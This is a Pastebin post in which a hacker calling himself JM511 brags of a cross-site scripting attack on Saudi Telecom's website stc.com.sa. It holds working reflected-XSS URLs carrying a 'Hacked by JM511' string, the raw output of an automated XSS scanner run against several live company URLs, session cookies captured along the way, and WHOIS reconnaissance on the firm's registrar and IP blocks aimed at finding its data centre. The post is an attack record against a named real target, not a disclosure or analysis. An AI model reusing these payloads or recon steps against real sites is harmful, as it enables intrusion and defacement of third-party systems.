Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- جني محجوز 2002 - 2012
- Xss Injection On STC.COM.SA
- جني محجوز , انجكتور , زومبي , شيخ الهكر
- JM511 ;) + ;) in3ctor
- STC.Com.Sa .. was Xss ;) by JM511
- When You already to fixing Ur Xss ;) LEt JM511 Know ;)
- FreeJob ;) Follow me : www.twitter.com/JM511
- [email protected] - 21EB3DBB
- My Site :> www.in3ctor.com
- @JM511 , @in3ctor .. Viva Q8
- عاطل ومتمرس :)
- ############################## www.stc.com.sa #############################
- Hacked by JM511" name="searchFormTopindex" method="get" style="display:inline" onsubmit="searchSubmit();">
- WoooW
- Xss Injection :)
- I Love It ;)
- http://www.stc.com.sa/cws/portal/ar/individual/ind-aljawal/ind-alj-start/%22%3EHacked%20by%20JM511
- ===========================================================================
- Target: http://www.stc.com.sa/cws/portal/en/?favouritLang=en --> 2012-09-25 17:14:15.299907
- ===========================================================================
- ---------------------------------------------
- [-] Hashing: 2455d2bab5ee85a10e6470da98d629de
- [+] Trying: http://www.stc.com.sa/cws/portal/en/?favouritLang=en/">2455d2bab5ee85a10e6470da98d629de
- [+] Browser Support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
- [-] Headers Results:
- Date: Tue, 25 Sep 2012 14:14:19 GMT
- Server: Apache
- Cache-Control: no-cache="Set-Cookie", max-age=600
- Location: http://www.stc.com.sa/cws/portal/en/stc/stc-hidden/stc-data-error
- Set-Cookie: JSESSIONID=jtCnQh8GjDSnTGl1YZ1HYmSl82pND2f2LrzLhDM5dyJFQd6D2n7z!-1020864940; path=/
- X-Powered-By: Servlet/2.5 JSP/2.1
- Expires: Tue, 25 Sep 2012 14:24:19 GMT
- Vary: Accept-Encoding,User-Agent
- X-UA-Compatible: IE=edge
- Connection: close
- http-code: 302
- total-time: 0.238672
- namelookup-time: 0.078937
- connect-time: 0.11953
- header-size: 491
- request-size: 314
- response-code: 302
- ssl-verifyresult: 0
- content-type: text/html
- cookielist: ['www.stc.com.sa\tFALSE\t/\tFALSE\t0\tJSESSIONID\tjtCnQh8GjDSnTGl1YZ1HYmSl82pND2f2LrzLhDM5dyJFQd6D2n7z!-1020864940']
- ---------------------------------------------
- [-] Injection Results:
- [+] Checking: url attack with ">PAYLOAD... fail
- Searching hash: 2455d2bab5ee85a10e6470da98d629de in target source code...
- Injection failed!
- ===========================================================================
- Target: http://careers.stc.com.sa/ --> 2012-09-25 17:14:15.299907
- ===========================================================================
- ---------------------------------------------
- [-] Hashing: cfa3c2b4031495c53d25fc22203da34c
- [+] Trying: http://careers.stc.com.sa/">cfa3c2b4031495c53d25fc22203da34c
- [+] Browser Support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
- [-] Headers Results:
- Date: Tue, 25 Sep 2012 14:15:37 GMT
- Server: Apache/2.2.22 (Ubuntu)
- X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.11
- X-Request-Id: eda499af83e0614a0c93ec7cfed82bbc
- X-Runtime: 0.005188
- X-Rack-Cache: miss
- Status: 404
- Vary: Accept-Encoding
- Content-Length: 5759
- Connection: Keep-Alive
- http-code: 404
- total-time: 0.565648
- namelookup-time: 0.220284
- connect-time: 0.25633
- header-size: 367
- request-size: 287
- response-code: 404
- ssl-verifyresult: 0
- content-type: text/html; charset=utf-8
- cookielist: []
- ---------------------------------------------
- [-] Injection Results:
- 404 Not Found: The server has not found anything matching the Request-URI
- ===========================================================================
- Target: http://www.stc.com.sa/ --> 2012-09-25 17:14:15.299907
- ===========================================================================
- ---------------------------------------------
- [-] Hashing: 1972799943d680d5cd6eb226199c27ee
- [+] Trying: http://www.stc.com.sa/">1972799943d680d5cd6eb226199c27ee
- [+] Browser Support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
- [-] Headers Results:
- Date: Tue, 25 Sep 2012 14:14:28 GMT
- Server: Apache
- Content-Length: 240
- Keep-Alive: timeout=2, max=200
- Connection: Keep-Alive
- http-code: 404
- total-time: 0.260906
- namelookup-time: 0.068524
- connect-time: 0.1257
- header-size: 201
- request-size: 283
- response-code: 404
- ssl-verifyresult: 0
- content-type: text/html; charset=iso-8859-1
- cookielist: []
- ---------------------------------------------
- [-] Injection Results:
- 404 Not Found: The server has not found anything matching the Request-URI
- ===========================================================================
- Target: http://www.stc.com.sa/cws/portal/en/individual?favouritLang=en --> 2012-09-25 17:14:15.299907
- ===========================================================================
- ---------------------------------------------
- [-] Hashing: 17ee0834a0869c7eb3715bfc85491645
- [+] Trying: http://www.stc.com.sa/cws/portal/en/individual?favouritLang=en/">17ee0834a0869c7eb3715bfc85491645
- [+] Browser Support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
- [-] Headers Results:
- Date: Tue, 25 Sep 2012 14:14:30 GMT
- Server: Apache
- Cache-Control: no-cache="Set-Cookie", max-age=600
- Location: http://www.stc.com.sa/cws/portal/en/stc/stc-hidden/stc-data-error
- Set-Cookie: JSESSIONID=9ZHCQh8Tp2zCTFppWhbXwN28qTPXLmKFMp59cPv3xzb6vd1wRvb6!431507543; path=/
- X-Powered-By: Servlet/2.5 JSP/2.1
- Expires: Tue, 25 Sep 2012 14:24:30 GMT
- Vary: Accept-Encoding,User-Agent
- X-UA-Compatible: IE=edge
- Connection: close
- http-code: 302
- total-time: 0.181937
- namelookup-time: 0.068722
- connect-time: 0.120254
- header-size: 489
- request-size: 324
- response-code: 302
- ssl-verifyresult: 0
- content-type: text/html
- cookielist: ['www.stc.com.sa\tFALSE\t/\tFALSE\t0\tJSESSIONID\t9ZHCQh8Tp2zCTFppWhbXwN28qTPXLmKFMp59cPv3xzb6vd1wRvb6!431507543']
- ---------------------------------------------
- [-] Injection Results:
- [+] Checking: url attack with ">PAYLOAD... fail
- Searching hash: 17ee0834a0869c7eb3715bfc85491645 in target source code...
- Injection failed!
- ===========================================================================
- Target: http://www.stc.com.sa/cws/portal/ar/ --> 2012-09-25 17:14:15.299907
- ===========================================================================
- ---------------------------------------------
- [-] Hashing: f65755bd001eb9029399f6813dc96d0e
- [+] Trying: http://www.stc.com.sa/cws/portal/ar/">f65755bd001eb9029399f6813dc96d0e
- [+] Browser Support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
- [-] Headers Results:
- Date: Tue, 25 Sep 2012 14:14:24 GMT
- Server: Apache
- Cache-Control: no-cache="Set-Cookie", max-age=600
- Set-Cookie: JSESSIONID=q21GQh8LRhfjp4x27Bt883hdZBKDGd1vjpkkHnH6H15Ws2Sfxxn4!933324500; path=/
- X-Powered-By: Servlet/2.5 JSP/2.1
- Expires: Tue, 25 Sep 2012 14:24:24 GMT
- Vary: Accept-Encoding,User-Agent
- X-UA-Compatible: IE=edge
- Connection: close
- http-code: 200
- total-time: 6.027491
- namelookup-time: 0.078538
- connect-time: 0.103068
- header-size: 411
- request-size: 297
- response-code: 200
- ssl-verifyresult: 0
- content-type: text/html;charset=UTF-8
- cookielist: ['www.stc.com.sa\tFALSE\t/\tFALSE\t0\tJSESSIONID\tq21GQh8LRhfjp4x27Bt883hdZBKDGd1vjpkkHnH6H15Ws2Sfxxn4!933324500']
- ---------------------------------------------
- [-] Injection Results:
- [+] Checking: url attack with ">PAYLOAD... ok
- Searching hash: f65755bd001eb9029399f6813dc96d0e in target source code...
- This injection is reflected by target, so can be a vulnerability!! :)
- Try a --reverse-check connection to validate that is 100% vulnerable
- ===========================================================================
- Target: http://www.m3com.com.sa/en --> 2012-09-25 17:14:15.299907
- ===========================================================================
- ---------------------------------------------
- [-] Hashing: 9fb3dc4c7f68a70ae8a8c01e077fa161
- [+] Trying: http://www.m3com.com.sa/en/">9fb3dc4c7f68a70ae8a8c01e077fa161
- [+] Browser Support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
- [-] Headers Results:
- Cache-Control: public, max-age=2700
- Expires: Tue, 25 Sep 2012 14:59:32 GMT
- Last-Modified: Tue, 25 Sep 2012 14:14:24 +0000
- Server: Footprint Distributor V4.8
- Vary: Cookie,Accept-Encoding,X-Device,User-Agent
- V-age: 0
- V-Cache: MISS
- V-TTL: 2700.000
- X-Device: desktop
- X-Varnish: 71448758
- Your-IP: 4.26.232.137
- Date: Tue, 25 Sep 2012 14:14:32 GMT
- Age: 0
- Connection: close
- Set-Cookie: ARPT=KJWMVQS10.10.29.13CKKUL; path=/
- http-code: 404
- total-time: 8.516019
- namelookup-time: 0.07884
- connect-time: 0.136633
- header-size: 496
- request-size: 288
- response-code: 404
- ssl-verifyresult: 0
- content-type: text/html; charset=utf-8
- cookielist: ['www.m3com.com.sa\tFALSE\t/\tFALSE\t0\tARPT\tKJWMVQS10.10.29.13CKKUL']
- ---------------------------------------------
- [-] Injection Results:
- 404 Not Found: The server has not found anything matching the Request-URI
- ===========================================================================
- ---------------------------------------------
- [-] Injection Results:
- 404 Not Found: The server has not found anything matching the Request-URI
- Mosquito(s) landed!
- ===========================================================================
- [*] Final Results:
- ===========================================================================
- - Injections: 10
- - Failed: 9
- - Sucessfull: 1
- - Accur: 10 %
- ===========================================================================
- [*] List of possible XSS injections:
- ===========================================================================
- [/] Shortered URL (Injection): http://is.gd/EInKlo
- [I] Target: http://www.stc.com.sa/cws/portal/ar/
- [+] Injection: http://www.stc.com.sa/cws/portal/ar/">f65755bd001eb9029399f6813dc96d0e
- [-] Method: xss
- [-] Browsers: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
- --------------------------------------------------
- [!] Trying to publish on: https://identi.ca/xsserbot01
- ===========================================================================
- [*] Statistic:
- ===========================================================================
- --------------------------------------------------
- Test Time Duration: 0:00:24.900331
- --------------------------------------------------
- Total Connections: 20
- -------------------------
- 200-OK: 14 | 404: 6 | 503: 0 | Others: 0
- Connec: 70 %
- --------------------------------------------------
- Total Payloads: 10
- -------------------------
- Checker: 0 | Manual: 0 | Auto: 10 | DCP: 0 | DOM: 0 | Induced: 0 | XSR: 0 | XSA: 0 | COO: 0
- --------------------------------------------------
- Total Injections: 10
- -------------------------
- Failed: 9 | Sucessfull: 1
- Accur : 10 %
- -------------------------
- Total Discovered: 1
- -------------------------
- Checker: 0 | Manual: 0 | Auto: 1 | DCP: 0 | DOM: 0 | Induced: 0 | XSR: 0 | XSA: 0 | COO: 0
- --------------------------------------------------
- False positives: 0 | Vulnerables: 1
- -------------------------
- Mana: 24500
- --------------------------------------------------
- [I] Error publishing some discovered XSS injections
- :) GoodBye Admin ;) Was Here )(JM511)(
- ===============================================
- hacked by jm511" name="searchFormTopindex" method="get" style="display:inline" onsubmit="searchSubmit();">
- http://www.stc.com.sa/cws/portal/ar/%22%3Ehacked%20by%20jm511
- ================================================
- STC.COM.SA
- الداتا سنتر تبع الstc
- [Search Query: stc.com.sa, Whois Server Used: saudinic.net]
- ####################
- تمام الحين نبحث عن الداتا سنتر تبع saudinic.net
- Registrant:
- Info Highway Corp.
- P.O. Box 90733
- Riyadh, Central 11623
- SA
- 966-1-452-8015
- Fax:966-1-452-8127
- Domain Name: SAUDINIC.NET
- Administrative Contact:
- Abu-Durrah, Samer [email protected]
- P.O. Box 90733
- Riyadh, Central 11623
- SA
- 966-1-452-8015
- Fax:966-1-452-8127
- Technical Contact:
- Abu-Durrah, Samer [email protected]
- P.O. Box 90733
- Riyadh, Central 11623
- SA
- 966-1-452-8015
- Fax:966-1-452-8127
- Record last updated 03-27-2010 09:52:14 PM
- Record expires on 03-15-2012
- Record created on 03-15-2000
- Domain servers in listed order:
- NS1.MYDOMAIN.COM 64.94.117.193
- NS2.MYDOMAIN.COM 64.94.31.67
- NS3.MYDOMAIN.COM 66.150.161.137
- NS4.MYDOMAIN.COM 63.251.83.74
- ####################
- معلومات عن saudimasters.com
- Record last updated 02-13-2010 08:33:02 AM
- Record expires on 01-27-2012
- Record created on 01-27-1999
- Domain servers in listed order:
- NS1.ARABSERVERS.NET 216.157.145.10
- NS2.ARABSERVERS.NET 216.157.145.11
- NS3.ARABSERVERS.NET 216.157.145.13
- NS4.ARABSERVERS.NET 216.157.145.12
- ######################
- 212.0.0.0 - 213.255.255.255
- RIPE NCC
- European Regional Registry
- European Union
- RIPE NCC Registration Services Department
- RIPE Network Coordination Centre
- P.O. Box 10096
- 1001 EB Amsterdam
- the Netherlands
- phone: +31 20 535 4444
- fax: +31 20 535 4445
- RIPE NCC Registration Services Department
- RIPE Network Coordination Centre
- P.O. Box 10096
- 1001 EB Amsterdam
- the Netherlands
- phone: +31 20 535 4444
- fax: +31 20 535 4445
- RIPE NCC Operations
- Singel 258
- 1016 AB Amsterdam
- The Netherlands
- phone: +31 20 535 4444
- fax: +31 20 535 4445
- EU-ZZ-212-213
- Updated: 09-Dec-2004
- Source: whois.ripe.net
- Completed at 6/12/2011 1:26:05 AM
- Processing time: 0.00 seconds
- ########################
- 212.118.128.0 - 212.118.159.255
- SaudiNet, Saudi Telecom Company
- Saudi Arabia
- Saudi Telecom Co. Registry Admin-C contact
- King Fahad Road, Abraj Atta'awuneya(NCCI Building), South Tower, 4th floor, Saudi Net
- P.O.Box: 295997
- Riyadh 11351
- Saudi Arabia
- phone: +966-1-218-0300
- fax: +966-1-218-0311
- Saudi Telecom Co. Registry Tech-C contact
- King Fahad Road, Abraj Atta'awuneya(NCCI Building), South Tower, 4th floor, Saudi Net
- P.O.Box: 295997
- Riyadh 11351
- Saudi Arabia
- phone: +966-1-218-0300
- fax: +966-1-218-0311
- Suliman I. Al-Zain
- Saudi Telecom Co. (SaudiNet)
- P.O.Box: 295997, Riyadh 11351, Saudi Arabia.
- phone: +9661 218 2034
- fax: +9661 218 0311
- For any Abuse or Spam Please send an email to abuse @saudi.net.sa
- For any Abuse or Spamming please send your requests directly to [email protected]
- For any Abuse or Spamming please send your reques
- SA-STC-981209
- Updated: 12-Jan-2006
- Source: whois.ripe.net
- Completed at 6/12/2011 1:26:05 AM
- Processing time: 0.00 seconds
- ####################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement